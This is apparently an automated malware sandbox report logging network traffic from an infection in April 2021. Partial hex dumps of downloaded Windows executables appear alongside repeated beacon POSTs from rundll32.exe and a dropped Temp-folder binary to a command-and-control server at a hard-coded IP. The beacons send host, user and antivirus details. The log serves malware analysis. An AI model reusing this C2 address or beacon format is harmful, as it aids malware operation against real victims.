00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AV5=A;";;;;;;-;RichPEL8'Y"!P az@ACR,x8?4:f8(@P@@.textr `.data( @.idata6P @@.didat4p6@.rsrc8@@.reloc4:<<@B
                                                                                                                                          Apr 28, 2021 22:58:43.260489941 CEST2274INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 28 Apr 2021 20:58:43 GMT
                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                          Content-Length: 1246160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                          ETag: "1303d0-57aa1f0b0df80"
                                                                                                                                          Expires: Thu, 29 Apr 2021 20:58:43 GMT
                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                          X-Cache-Status: EXPIRED
                                                                                                                                          X-Cache-Status: HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#4gZgZgZnsZ[eZBcZYjZ_mZ^lZE[oZ[dZg[Z^mZZfZfZXfZRichgZPELb["!w@@=Tp}pT@.text `.rdataRT@@.datatG`"B@.rsrcpd@@.reloc}~h@B
                                                                                                                                          Apr 28, 2021 22:58:44.534013987 CEST3599INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 28 Apr 2021 20:58:44 GMT
                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                          Content-Length: 144848
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                          ETag: "235d0-57aa1f0b0df80"
                                                                                                                                          Expires: Thu, 29 Apr 2021 20:58:44 GMT
                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                          X-Cache-Status: EXPIRED
                                                                                                                                          X-Cache-Status: HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$l$JOJOJOuOJO?oKNJO?oINJO?oONJO?oNNJOmKNJO-nKNJOKO~JO-nNNJO-nJNJO-nOJO-nHNJORichJOPELb["!bP@0x@`T(@l.text `.rdataDF@@.data @.rsrcx0@@.reloc`@@B
                                                                                                                                          Apr 28, 2021 22:58:44.762919903 CEST3751INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 28 Apr 2021 20:58:44 GMT
                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                          Content-Length: 83784
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                          ETag: "14748-57aa1f0b0df80"
                                                                                                                                          Expires: Thu, 29 Apr 2021 20:58:44 GMT
                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                          X-Cache-Status: EXPIRED
                                                                                                                                          X-Cache-Status: HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NEEE"GL^NElUVA_D2DDRichEPEL8'Y"! @@A H?08@.text `.dataD@.idata@@.rsrc @@.reloc0@B
                                                                                                                                          Apr 28, 2021 22:58:49.883857965 CEST3991INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 28 Apr 2021 20:58:49 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          Data Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d c9 4b 0a 80 30 0c 05 c0 13 d9 07 2e f5 34 92 3e a8 48 3f b4 69 8d b7 37 db 99 a4 da 0e 60 3e 8c 55 66 66 d1 ab 7f 41 6a c6 db 36 a9 45 5d a0 89 99 03 72 17 0e 7f d0 9c e3 12 d8 e8 6b 0f 34 9e 3f 58 f0 79 b5 48 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 54K0.4>H?i7`>UffAj6E]rk4?XyH0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          10192.168.2.449753176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:10.858910084 CEST4525OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          100192.168.2.449800176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:25.792898893 CEST4809OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          101176.111.174.11480192.168.2.449800C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:25.889651060 CEST4809INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:25 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          102192.168.2.449801176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:26.093440056 CEST4810OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          103176.111.174.11480192.168.2.449801C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:26.193414927 CEST4810INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:26 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          104192.168.2.449802176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:26.413188934 CEST4811OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          105176.111.174.11480192.168.2.449802C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:26.517174959 CEST4811INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:26 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          106192.168.2.449803176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:26.724426985 CEST4812OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          107176.111.174.11480192.168.2.449803C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:26.824716091 CEST4812INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:26 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          108192.168.2.449804176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:27.032350063 CEST4813OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          109176.111.174.11480192.168.2.449804C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:27.132389069 CEST4813INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:27 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          11176.111.174.11480192.168.2.449753C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:10.960712910 CEST4526INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:10 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          110192.168.2.449805176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:27.347110033 CEST4814OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          111176.111.174.11480192.168.2.449805C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:27.449599028 CEST4814INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:27 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
